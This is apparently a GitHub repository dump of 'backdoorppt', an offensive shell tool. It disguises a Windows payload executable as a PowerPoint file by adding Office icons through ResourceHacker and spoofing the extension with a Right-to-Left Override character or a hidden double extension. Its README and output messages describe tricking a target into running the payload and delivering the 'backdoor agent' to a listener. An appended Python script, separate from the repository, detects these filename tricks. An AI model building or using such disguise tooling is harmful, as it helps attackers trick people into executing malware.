├── README.md
├── backdoorppt.sh
├── bin
    ├── .backdoorppt-logo.png
    ├── logo.png
    └── reshacker_setup.exe
├── icons
    ├── Microsoft-Excel.ico
    ├── Microsoft-Word-2016.ico
    ├── Microsost-Word-2013.ico
    ├── Modern-Word.ico
    ├── OWA-icon.ico
    ├── PowerPoint-blue.ico
    ├── PowerPoint-orange.ico
    └── Powerpoint-green.ico
├── output
    └── .set
└── settings


/README.md:
--------------------------------------------------------------------------------
[![Version](https://img.shields.io/badge/backdoorppt-1.7-brightgreen.svg?maxAge=259200)]()
[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Supported_OS-kali,Ubuntu,Mint-blue.svg)]()



# backdoorppt - 'Office spoof extensions tool'

    Version release: v1.7-Stable
    Author: pedro ubuntu [ r00t-3xp10it ]
    Distros Supported: Linux Kali, Ubuntu, Mint
    Suspicious-Shell-Activity© (SSA) RedTeam develop @2017

![backdoorppt](http://i.cubeupload.com/2JJ2IA.png)


## Transform your payload.exe into one fake word doc (.ppt)

    Simple script that allows users to add a ms-word icon to one
    existing executable.exe (using resource-hacker as backend application)
    and a ruby one-liner command that will hide the .exe extension
    and add the word doc .ppt extension to the end of the file name.


## Spoof extension methods

    backdoorppt tool uses 2 different extension spoof methods:
    'Right to Left Override' & 'Hide Extensions for Known File Types'
    Edit the 'settings' file to choose which method should be used.

    cd backdoorppt && nano settings

![backdoorppt](http://i.cubeupload.com/ldKWDd.png)

## Dependencies (backend applications required)

    xterm, wine, ruby, ResourceHacker(wine)

    'backdoorppt script will work on wine 32 or 64 bits'
    'it also installs ResourceHacker under .../.wine/Program Files/.. directories'

## Tool Limitations

    1º - backdoorppt only supports windows binaries to be transformed (.exe -> .ppt)
    2º - backdoorppt requires ResourceHacker installed (wine) to change the icons
    3º - backdoorppt offers 6 different icons (.ico) to choose from
    4º - backdoorppt does not build real ms-word doc files, but it will transform
         your payload.exe to look like one word doc file (social engineering).


## Backdoorppt working (Kali distros)
![backdoorppt](http://i.cubeupload.com/ueWu5R.png)

## transformed files on-target system (windows)
![backdoorppt](http://i.cubeupload.com/Hkv0jp.jpeg)


## Final notes

    Target user thinks they are opening a word document file,
    but in fact they are executing one binary payload instead.


## Video tutorials:

    backdoorppt: https://www.youtube.com/watch?v=k4UJW4p1E3w&t=1s


### Special thanks:
**@Damon Mohammadbagher** | **Article: goo.gl/hKHesk**


--------------------------------------------------------------------------------
/backdoorppt.sh:
--------------------------------------------------------------------------------
#!/bin/sh
###
# backdoorppt - A MS Office spoof extensions tool
# Author: pedr0 Ubuntu [r00t-3xp10it] version: 1.7
# Suspicious-Shell-Activity (SSA) RedTeam develop @2017
# codename: ghost-in-a-shell
#
# [ TOOL DESCRIPTION ]
# This tool Supports wine 32 or 64 bits installations
# Available with 6 icons to change (backdoorppt/icons)
# Available 2 diferent name transformations methods (ruby or bash)
# 1 - Right to Left Override (nameexe.ppt) <-- ruby
# 2 - Hide Extensions for Known File Types (name.ppt.exe) <-- bash
###



#
# Colorise shell Script output leters
#
Colors() {
  Escape="\033";
  white="${Escape}[0m";
  RedF="${Escape}[31m";
  GreenF="${Escape}[32m";
  YellowF="${Escape}[33m";
  BlueF="${Escape}[34m";
  CyanF="${Escape}[36m";
  Reset="${Escape}[0m";
}




#
# variable declarations
#
VeR="1.7" # script version
ArCh=`arch` # store attackers arch
IPATH=`pwd` # store script full path
HoME=`echo ~` # store home full path
CnA="ghost-in-a-shell" # script codename
HkLm=`cat $HoME/.wine/system.reg | egrep -m 1 'ProductName' | cut -d '=' -f2 | cut -d '"' -f2` > /dev/null 2>&1 # wine windows version
#
# Read options (configurations) from settings file ..
#
tRan=`cat $IPATH/settings | egrep -m 1 "BASH_TRANSFORMATION" | cut -d '=' -f2` > /dev/null 2>&1
ByPa=`cat $IPATH/settings | egrep -m 1 "RESOURCEHACKER_BYPASS" | cut -d '=' -f2` > /dev/null 2>&1



#
# configuring correct arch
#
if [ "$ArCh" = "i386" ] || [ "$ArCh" = "i686" ]; then
  dEd="x86"
  arch="wine"
  PgFi="Program Files"
elif [ "$ArCh" = "x86_64" ] || [ "ArCh" = "amd64" ]; then
  dEd="x64"
  arch="wine64"
  PgFi="Program Files (x86)" # default value
else
  dEd="x64"
  arch="wine64"
  PgFi="Program Files"
fi
#
# Resource hacker install path (local)
#
RhI="$HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe"



#
# Tool banner
#
cat << !

    +-+-+-+-+-+-+-+-+-+-+-+-+---+
    |b|a|c|k|d|o|o|r|p|p|t|:|$VeR|
    +-+-+-+-+-+-+-+-+-+-+-+-+---+
    'Office spoof extensions tool'
    Credits: Damon Mohammadbagher

!


Colors;
#
# check for dependencies
#
echo ${BlueF}[☆]${white}" Checking backend applications .. "${Reset};
sleep 1
if ! [ "$tRan" = "YES" ]; then
  apc=`which ruby`
  if [ "$?" != "0" ]; then
    echo ""
    echo ${RedF}[x]${white}" Ruby interpreter : ${RedF}not found! "${Reset};
    echo ${RedF}[x]${white}" This funtion requires ruby to work! "${Reset};
    sleep 1
    exit
  else
    echo ${BlueF}[☆]${white}" Ruby installation : ${GreenF}found! "${Reset};
    sleep 1
  fi
fi

# search for wine installation
apc=`which $arch`
if [ "$?" != "0" ]; then
  echo ""
  echo ${RedF}[x]${white}" Wine installation : ${RedF}not found! "${Reset};
  sleep 1
  echo ${RedF}[x]${white}" This script requires wine to work! "${Reset};
  echo ${RedF}[x]${white}" Please wait, installing missing dependencies .."${Reset};
  echo ""
  sudo apt-get install $arch
  echo ""
  exit
else
  echo ${BlueF}[☆]${white}" Wine installation : ${GreenF}found! "${Reset};
  sleep 1
fi

# search for zenity installation
apc=`which zenity`
if [ "$?" != "0" ]; then
  echo ""
  echo ${RedF}[x]${white}" Zenity installation : ${RedF}not found! "${Reset};
  sleep 1
  echo ${RedF}[x]${white}" This script requires Zenity to work! "${Reset};
  echo ${RedF}[x]${white}" Please wait, installing missing dependencies .."${Reset};
  echo ""
  sudo apt-get install zenity
  echo ""
  exit
else
  echo ${BlueF}[☆]${white}" Zenity installation : ${GreenF}found! "${Reset};
  sleep 1
fi

# search for xterm installation
apc=`which xterm`
if [ "$?" != "0" ]; then
  echo ""
  echo ${RedF}[x]${white}" Xterm installation : ${RedF}not found! "${Reset};
  sleep 1
  echo ${RedF}[x]${white}" This script requires xterm to work! "${Reset};
  echo ${RedF}[x]${white}" Please wait, installing missing dependencies .."${Reset};
  echo ""
  sudo apt-get install xterm
  echo ""
  exit
else
  echo ${BlueF}[☆]${white}" Xterm installation : ${GreenF}found! "${Reset};
  sleep 1
fi

#
# Bypass Resource hacker funtion (replace icon)
# OR search if drive_c correct folder exists
#
if [ "$ByPa" = "NO" ]; then
  if [ -e "$HoME/.wine/drive_c/$PgFi" ]; then
    echo ${BlueF}[☆]${white}" Wine $PgFi : ${GreenF}found! "${Reset};
    sleep 1
  else
    echo ${RedF}[x]${white}" Wine $PgFi : ${RedF}not found! "${Reset};
    echo ${RedF}[x]${white}" $HoME/.wine/drive_c/$PgFi "${Reset};
    sleep 1
    echo ${RedF}[x]${white}" Please wait, running winecfg! "${Reset};
    winecfg > /dev/null 2>&1
    echo ""
    # List directorys just to be sure ..
    echo ${RedF}"Listing drive_c directorys: "${Reset};
    ls $HoME/.wine/drive_c
    echo ""
    sleep 1
    exit
  fi
fi



#
# START OF SCRIPT FUNTIONS ..
#
rUn=$(zenity --question --title="☠ BackdoorPPt ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  # orginal payload full-path variable
  UpL=$(zenity --title "☠ PAYLOAD TO BE TRANSFORMED (.exe) ☠" --filename=$IPATH --file-selection --text "chose payload to be transformed") > /dev/null 2>&1
  # icon replacement variable
  if [ "$ByPa" = "NO" ]; then
    IcOn=$(zenity --list --title "☠ ICON REPLACEMENT ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "Microsoft-Word-2016.ico" FALSE "Microsost-Word-2013.ico" FALSE "Powerpoint-green.ico" FALSE "Powerpoint-blue.ico" FALSE "Powerpoint-orange.ico" FALSE "Microsoft-Excel.ico" FALSE "Input your own icon" --width 350 --height 310) > /dev/null 2>&1
    #
    # User have decided to input is own icon.ico file ..
    # So, were is it ? (your icon.ico full path) ..
    #
    if [ "$IcOn" = "Input your own icon" ]; then
      ImR=$(zenity --title "☠ ICON REPLACEMENT ☠" --filename=$IPATH --file-selection --text "chose icon.ico to use") > /dev/null 2>&1
      PaTh="$ImR"
    else
      PaTh="$IPATH/icons/$IcOn"
    fi
  fi
  #
  # Input payload output name ..
  # And check if inputed program its one .exe binarie ..
  #
  MiP=$(zenity --entry --title "☠ PAYLOAD FINAL NAME ☠" --text "example: curriculum" --width 300) > /dev/null 2>&1
  che=`echo $UpL | cut -d '.' -f2`
  if ! [ "$che" = "exe" ]; then
    echo ""
    echo ${RedF}[x]${YellowF}ABORT: Only [${RedF}.exe${YellowF}] binaries are accepted .. ${Reset};
    sleep 2
    exit
  fi

  #
  # If RH BYPASS its not active (settings file)
  #
  if [ "$ByPa" = "NO" ]; then
    #
    # Config WINE windows version (if not supported) ..
    #
    if ! [ "$HkLm" = "Microsoft Windows 7" ]; then
      echo ${RedF}[x]${white}" Wine system detected: $HkLm "${Reset};
      echo ${RedF}[x]${white}" FakeImageExploiter requires: windows 7 version .."${Reset};
      echo ${YellowF}[☆]" Starting winecfg, Please sellect required version .."${Reset};
      sleep 1
      winecfg > /dev/null 2>&1
    fi

    #
    # Check for resource hacker installation (wine)
    #
    if [ -f "$RhI" ]; then
      echo ${BlueF}[☆]${white}" ResourceHacker.exe : ${GreenF}found! "${Reset};
      sleep 1
    else
      echo ${RedF}[x]${white}" ResourceHacker.exe : ${RedF} not found! "${Reset};
      sleep 1
cat << !

    Installing ResourceHacker under .wine directorys...
    Version:windows7 Arch:$ArCh Path:drive_c/$PgFi
    $HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe

!
      sleep 3
      xterm -T "BackdoorPPt" -geometry 90x26 -e "$arch $IPATH/bin/reshacker_setup.exe && sleep 3"
      echo ${YellowF}[⊶]${white}" Please wait, restarting tool! "${Reset};
      echo ${YellowF}[⊶]${white}" For proper ResourceHacker.exe Instalation! "${Reset};
      sleep 2
      exit
    fi

    #
    # wine command to call resourcehacker and add an MS-WORD.ico to the backdoor
    #
    echo ${YellowF}[☆]" Working on backdoor agent .."${Reset};
    sleep 1
    echo ${BlueF}[☆]${white}" Transforming backdoor agent : ${GreenF}done .. "${Reset};
    $arch "$RhI" -open "$UpL" -save "$IPATH/output/backdoor.exe" -action addskip -res "$PaTh" -mask ICONGROUP,MAINICON,
    echo ${BlueF}[☆]${white}" Change backdoor agent icons : ${GreenF}done .. "${Reset};
    sleep 1

  else

    # Copy binary to output folder to be manually transformed ..
    cp $UpL $IPATH/output/backdoor.exe > /dev/null 2>&1
    echo ${YellowF}[☆]${white}" Manually change icon.ico sellected .."${Reset};
    echo ${YellowF}[☆]${white}" Use your favorite editor to change the icon of [backdoor.exe]"${Reset};
    echo ${YellowF}[☠]" When finish, press any key to Continue .."${Reset};
    # Waiting for you to finish (read op) ..
    read op

  fi


  #
  # insert .ppt hidden extension
  #
  echo ${BlueF}[☆]${white}" Adding agent hidden extensions : ${GreenF}done .. "${Reset};
  # chose ruby or bash transformation
  if [ "$tRan" = "YES" ]; then
    mv $IPATH/output/backdoor.exe $IPATH/output/$MiP.ppt.exe > /dev/null 2>&1
  else
    mv $IPATH/output/backdoor.exe $IPATH/output/backdoor_ppt.exe > /dev/null 2>&1
  fi

  sleep 1
  cd $IPATH/output
  #
  # rename backdoor output name (only RTLO method)
  #
  echo ${BlueF}[☆]${white}" Word doc builder (output-name) : ${GreenF}done .. "${Reset};
  if ! [ "$tRan" = "YES" ]; then
    echo "$MiP" > outname.txt
    #
    # Ruby one-liner command to READ the contents of 'outname.txt' file,
    # That contains the agent output name, then stores it into 'fil' ruby local
    # variable to be able to rename the agent output name using ruby syntax ..
    #
    ruby -e 'fil = File.read("outname.txt") and File.rename("backdoor_ppt.exe", "#{fil}\xe2\x80\xaetpp.exe")'
    rm outname.txt > /dev/null 2>&1
  fi
  sleep 1
  cd $IPATH


  #
  # Display final outputs to user
  #
  echo ${YellowF}[☆]" Task over, Writing reports .."${Reset};
  sleep 2
  if [ "$IcOn" = "Input your own icon" ]; then
    IcOn="$PaTh"
  fi

  #
  # IF 'hide know file types extension' method its active
  #
  if [ "$tRan" = "YES" ]; then
    echo ""
    echo ${RedF}" Icon select : $IcOn"${Reset};
    echo ${RedF}" Final file : $IPATH/output/$MiP.ppt.exe"${Reset};
cat << !

    Your backdoor agent its now transformed into one fake
    word doc (ppt) remmenber that .exe extensions will not
    be 'visible' under windows systems, because the system
    default behavior its: NOT show hidden extensions ..

    We are now ready to start a handler (listener) and
    deliver the transformed agent to the target machine.

!

  else

    #
    # IF 'RTLO' method its active
    #
    echo ""
    dre="exe.ppt"
    echo ${RedF}" Icon select : $IcOn"${Reset};
    echo ${RedF}" Final file : $IPATH/output/$MiP$dre"${Reset};
cat << !

    Your backdoor agent its now transformed into one fake
    word doc (ppt) using RTLO spoofing extensions method.

    We are now ready to start a handler (listener) and
    deliver the transformed agent to the target machine.

!
  fi


#
# The user dont want to run the tool (aborted switch) ..
#
else
  echo ${RedF}[x]${white}" Aborting all tasks : ${GreenF}done!"${Reset};
  sleep 2
  echo ""
  echo ${white}Codename${RedF}::${white}$CnA ${Reset};
  echo ${white}Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
  echo ${white}backdoorppt${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
  exit
fi
#
# exit tool, and good nigth ..
#
echo ${white}Codename${RedF}::${white}$CnA ${Reset};
echo ${white}Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
echo ${white}backdoorppt${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
exit


--------------------------------------------------------------------------------
/bin/.backdoorppt-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/bin/.backdoorppt-logo.png


--------------------------------------------------------------------------------
/bin/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/bin/logo.png


--------------------------------------------------------------------------------
/bin/reshacker_setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/bin/reshacker_setup.exe


--------------------------------------------------------------------------------
/icons/Microsoft-Excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Microsoft-Excel.ico


--------------------------------------------------------------------------------
/icons/Microsoft-Word-2016.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Microsoft-Word-2016.ico


--------------------------------------------------------------------------------
/icons/Microsost-Word-2013.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Microsost-Word-2013.ico


--------------------------------------------------------------------------------
/icons/Modern-Word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Modern-Word.ico


--------------------------------------------------------------------------------
/icons/OWA-icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/OWA-icon.ico


--------------------------------------------------------------------------------
/icons/PowerPoint-blue.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/PowerPoint-blue.ico


--------------------------------------------------------------------------------
/icons/PowerPoint-orange.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/PowerPoint-orange.ico


--------------------------------------------------------------------------------
/icons/Powerpoint-green.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Powerpoint-green.ico


--------------------------------------------------------------------------------
/output/.set:
--------------------------------------------------------------------------------
.set


--------------------------------------------------------------------------------
/settings:
--------------------------------------------------------------------------------
##############################################################################
#                                                                            #
#   The following config file will allow you to customize settings within    #
#   BACKDOORPPT tool, The lines that Do not have comment code ("#") are      #
#   the fields you want to toy with. There are additional options, read      #
#   the comments For additional config settings.                             #
#                                                                            #
#   CHANGING THIS SETTINGS WILL AFFECT 'backdoorppt.sh' WAY OF WORKING       #
#                                                                            #
##############################################################################



### Spoof extension method to use?
#
# RUBY - RTLO Right to Left Override
# This trick uses Right to Left unicode to reverse the last six characters so that
# the extension is spoofed, for example a notes.exe file can be renamed to notesexe.txt
# Although the file extension clearly shows as .txt in Explorer the Windows operating
# system still recognizes the file as an application. An example of 1º method: notesexe.txt
#
# BASH - Hide Extensions for Known File Types
# There is a setting in Folder Options where you can hide the file extension so that
# only the filename is visible in Explorer while the extension is hidden. The problem
# with this setting is the default option is set to hide and a less careful user can be
# tricked when there is a double extension. An example of 2º method: notes.txt.exe
#
# backdoorppt by default uses 'Right to Left Override' (ruby)
# but it can be configured to use 'Hide Extensions for Known File Types' (bash)
# Accepted values are: YES (bash) or NO (ruby)
----------------------
BASH_TRANSFORMATION=NO
----------------------




### BYPASS RESOURCEHACKER SOFTWARE WORK
# This option bypasses the use of resourcehacker.exe to change the icons
# of the payload to be transformed (you will have to change the icons manually)
# because backdoorppt will only change the payload extensions if this option is active.
# Accepted values are: YES or NO
------------------------
RESOURCEHACKER_BYPASS=NO
------------------------



_EOF

--------------------------------------------------------------------------------
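
A defender-side check for the two filename tricks the settings file describes (Right to Left Override and a document extension placed before a hidden `.exe`), as an added example that is not part of the backdoorppt repository. The extension lists, function names and sample filenames are assumptions constructed for illustration, and `displayed_name` is a simplified model of RLO rendering, not the full Unicode Bidirectional Algorithm.

```python
# Added example: flag filenames whose displayed extension differs from the one
# the operating system acts on. Suitable for mail-gateway or upload filtering.

# Unicode bidirectional formatting characters (embeddings, overrides, isolates, marks).
BIDI_CONTROLS = "\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f"
RLO, PDF = "\u202e", "\u202c"  # Right-to-Left Override, Pop Directional Formatting
_STRIP = {ord(c): None for c in BIDI_CONTROLS}

# Assumed, non-exhaustive lists: what Windows runs vs. what users expect to be data.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "lnk"}
DOCUMENT_EXTS = {"ppt", "pptx", "doc", "docx", "xls", "xlsx", "pdf", "txt", "jpg", "png"}


def _ext(name):
    """Lower-cased text after the last dot, or '' when there is no dot."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def real_extension(name):
    """Extension the OS acts on: taken from the stored (logical) character order."""
    return _ext(name.translate(_STRIP))


def displayed_name(name):
    """Approximate what a bidi-aware file manager shows for an RLO name.

    Simplification: text after U+202E is reversed up to U+202C or end of string.
    """
    out, i = [], 0
    while i < len(name):
        if name[i] == RLO:
            end = name.find(PDF, i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        else:
            out.append(name[i])
            i += 1
    return "".join(out).translate(_STRIP)


def spoof_findings(name):
    """Return a list of human-readable findings; empty list means nothing flagged."""
    findings = []
    ext = real_extension(name)
    if ext not in EXECUTABLE_EXTS:
        return findings
    shown = displayed_name(name)
    if any(c in name for c in BIDI_CONTROLS) and _ext(shown) != ext:
        findings.append("rtlo: shown as %r, runs as .%s" % (shown, ext))
    parts = name.translate(_STRIP).lower().split(".")
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
        findings.append("double-extension: .%s.%s" % (parts[-2], ext))
    return findings


# Constructed sample names (not taken from any real incident).
SAMPLES = ["curriculum\u202etpp.exe", "curriculum.ppt.exe", "slides.ppt", "setup.exe"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", spoof_findings(sample) or "ok")
```

Rejecting or quarantining any attachment name that contains a bidi control character is usually safe, since legitimate filenames rarely need one; enabling "show file extensions" in Explorer addresses the second method.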